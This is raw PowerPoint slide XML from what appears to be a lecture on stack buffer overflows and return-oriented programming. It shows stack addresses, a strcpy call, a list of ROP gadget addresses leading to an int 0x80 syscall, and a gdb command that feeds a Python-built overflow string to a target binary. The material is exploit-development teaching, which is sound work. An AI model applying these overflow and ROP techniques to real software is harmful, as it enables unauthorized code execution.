            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775071" y="518106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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809074" y="5053162"/>
            <a:ext cx="6256324" cy="70776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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91b	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="765073744"/>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en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0806e91a</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff656</a:t>
                      </a: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357</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121142" y="64512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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2028569525"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="260445" y="4336604"/>
          <a:ext cx="3696160" cy="2056355"/>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411271">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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411271">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0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411271">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0xbffff6890</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411271">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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411271">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0x0806e91b</a:t>
                      </a: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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="3380669"/>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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784903" y="545637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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809074" y="5053162"/>
            <a:ext cx="6256324" cy="70776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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91b	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260445" y="4763613"/>
            <a:ext cx="3696160" cy="378658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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479672" y="647899"/>
            <a:ext cx="2831284" cy="365172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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630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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, a pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret gadget will put the next value on the stack into the %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need a gadget to get our data into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>0x80bb6d6 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x80481c9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>Pop %ecx, ret at 0x80e4bd1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x80541b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x807b406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>int 0x80 at 0x80493e1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>Now we can build our shellcode!</a:t>
            </a:r>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358</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130566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the ROP chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We’ve reached the point where building the ROP payload by hand is tedious (that little endian)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
